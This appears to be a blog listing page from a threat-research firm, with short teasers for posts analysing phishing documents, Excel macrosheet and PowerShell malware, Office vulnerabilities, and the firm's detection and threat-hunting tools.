With the holiday season upon us and Log4j-nia still keeping most of us awake at night, we want to revisit an old chum who continues to operate in full swing amidst the chaos.
How does fishing work in real life? The fisherman chooses a suitable place for fishing, he chooses the right tools; a fishing rod or nets, and he also needs to choose the right bait. When everything is ready, he can expect a good degree of success.
We found a wave of phishing documents containing a very interesting lure. We researched the tactics of this attack in more depth and discovered some unique TTPs including a Stage 2 Blogspot service marked as adult content requiring that you must be logged in as an authorized user with an account no less than a year old. Let's look at how the next sample works.
A few days ago, we discovered a wave of phishing emails with an attached document. The fact is that a considerable number of samples had zero detection on the VT service. While several files had no AV detection for some time, we decided to focus on this wave and explore it in more detail.
Protecting an organization from today's cyber threats is not a simple but rather extensive task. The threat landscape is constantly changing, requiring a flexible approach to defense. The threats, techniques, and vulnerabilities that cybercriminals exploit may be unknown to organizations that provide protection to their users. This is a prime example of the exploitation of a critical vulnerability. An exploit that was found in the wild.
Microsoft MSHTML Remote Code Execution Vulnerability As we roll into autumn and the season changes, so does the threat landscape. The emergence of new CVE signals another arms race with both sides vying for effectively leveraging the exploit and understanding how to mitigate the effects respectively.
Mobile devices as an espionage tool.
Email-borne pathogens frequently commence with the inclusion of a malicious document. This long-running trend continues to pose a serious threat to the security of organizations and users. Criminals are constantly improving their methods and looking for new ways to compromise victims. Payload trends change over time, with Ransomware being one that is capturing many headlines.
A few days ago, we found an interesting document in the wild that aims to download spyware applications. The sample in question shows low detection rates across multiple antivirus engines, which rouses our suspicion. The email containing the attachment document was allegedly sent from a logistics campaign.
We have found an exciting document that hides a whole chain of PS scripts. Unfortunately, the original document has used a coercive lure to make the victim enable macros that drop malicious artifacts. This specific document's lure is written in French "BIENVENUE DANS WORD Microsoft Word a ete mise a jour avec succes"
What we all need now and again is some exciting news, and since we have some, we wanted to make an article to share it! Earlier this month, our friends at Abuse.ch officially announced in a tweet that their MalwareBazaar project has integrated with InQuest’s Deep File Inspection (DFI) analysis stack.
At InQuest, we're fanatical about malware analysis and ingest real-world samples at-scale, dissecting millions of files daily. We leverage a combination of our Deep File Inspection (DFI™) analysis engine and a proprietary machine-learning apparatus to distill a daily volume of millions of samples down to a harvest consisting of dozens of "interesting" samples.
Throughout InQuest's research into detecting maldocs, deserving attention has been given to the graphical asset that is used as the coercive lure. From "Worm Charming", InQuest's Malware Lures Gallery, and Optical Character Recognition inspection of the instructive text to enable embedded logic, uncountable wins have been brought to the community's attention. This quick blog details a couple of approaches for acquiring maldoc images without the need to open the document and copy the image.
The SOC-Class is a niche course on cybersecurity operations, training CISOs, SOC Managers, and technical leads to build and excel in Cybersecurity Operations Centers SOCs/CSOCs. This use case development methodology is one of the approaches discussed in the course and is intended to provide a framework for mature and repeatable construction of engineered detections.
In this blog, we dissect a novel and stealthy Excel Macrosheet fueled malware campaign that currently bypasses most protection stacks to deliver ZLoader to its victims. We trace the earliest appearance to Monday, May 4th (Star Wars Day), and continue to actively track this evolving campaign.
In this quick, end of the week post, we wanted to touch on the ubiquitous COVID-19 (aka Corona Virus). Sharing an interesting lure, related malware, and some IOCs for colleagues to dig into while society on a whole is relegated to solitude in our homes. Our posting here is in no way comprehensive. There is a myriad of malware campaigns, disinformation operations, and general scamming revolving around the very concerning topic. Our goal is to further awareness and share some knowledge in the process.
In this post, we provide a detailed analysis of an interesting Excel 4.0 XLM macrosheet maldoc distribution campaign that is tied to a variety of executable payloads, a subject matter we'll be covering in a future blog. As of the time of writing, detection rates for this class of attack are relatively low, and these samples happily bypass the internal GSuite and O365 protection mechanisms.
InQuest combines Deep File Inspection (DFI) and RetroHunting™ to bring the threat hunting capabilities of VirusTotal Intelligence to your own environment. VirusTotal provides analysts with powerful tools to threat hunt against millions of files, domains, and IPs, but has the drawback of not currently offering a self-hosted option for organizations that wish to keep their data private.
Introduction In this blog, we discuss Adobe Extensible Metadata Platform (XMP) identifiers (IDs) and how they can be used as both pivot and detection anchors. Defined as a standard for mapping graphical asset relationships, XMP allows for tracking of both parent-child relationships and individual revisions. There are three categories of identifiers: original document, document, and instance.
InQuest provides an automated platform for SOC hunter that includes powerful means for inspecting files to detect the presence of malicious code. The platform ingests network data and then goes through a variety of analytic functions resulting in an effective risk score. Check out this interview between Ed Amoroso of Tag Cyber and Pedram Amini, our CTO.
In this short post, we share a YARA rule that threat hunters will find valuable for identifying potentially malicious Powershell pivots. Specifically, we'll be looking for base64 encoded Powershell directives. Additionally, some interesting real-world samples will be shared with the reader. Including an SSL certificate, Microsoft Windows shortcut (LNK) file, and a JPG image.
In this article, we analyze a malicious hta file that we found on VirusTotal. This instance uses a few interesting techniques to evade existing detection mechanisms. In this blog post, we provide an in-depth analysis of this instance and reveal the techniques that are utilized to keep the instance under the radar. At the time of hunting this instance, only two engines marked this instance as malicious.
In this article, we dissect a sophisticated multi-stage PowerShell script that was found on HybridAnalysis a few days back. The discussion entails an in-depth analysis of the various techniques that this particular malware instance utilized to keep itself under the radar. As of writing this article, none of the AntiViruses on VirusTotal detected this sample.
In this article, we dissect a sneaky malicious Microsoft Excel XLM file that we caught in the wild. To do so, we utilize a few open source as well as in-house tools to analyze the Excel document. During our analysis, we point out the limitations of a few popular file carving tools, such as foremost and scalpel, in extracting data from this and related samples.
InQuest helps organizations in both threat-hunting and incident response through the use of our RetroHunt capability. RetroHunting allows the searching of a historical data with signatures in order to see if any of the signatures match within that historical file set.
InQuest provides an on-premises network-focused security solution deployed at many high-volume, mission critical environments, including DISA’s Joint Regional Security Stack (JRSS)1. JRSS comprises a regional network security architecture subset for the Joint Information Environment (JIE), administered by DISA 2.
In reviewing the results of our Microsoft Office DDE malware hunt, we came across an interesting lure posing as an Securities and Exchange Commission (SEC) Office of Management and Budget (OMB) approval letter. The sample utilizes some tricks to increase chances of successful exploitation. We'll walk through the dissection of the components in this post.
On October 9th 2017, SensePost researchers posted a technique demonstrating macro-less command execution in Microsoft Office documents through Dynamic Data Exchange (DDE). While variations of this technique are known, the post sheds light on the fact that Microsoft has no intent to address the matter, and that "exploit" creation is trivial. This post provides an overview of the vulnerability, provides a mitigation, covers sample hunting, and covers the dissection of a few interesting samples gathered during the week.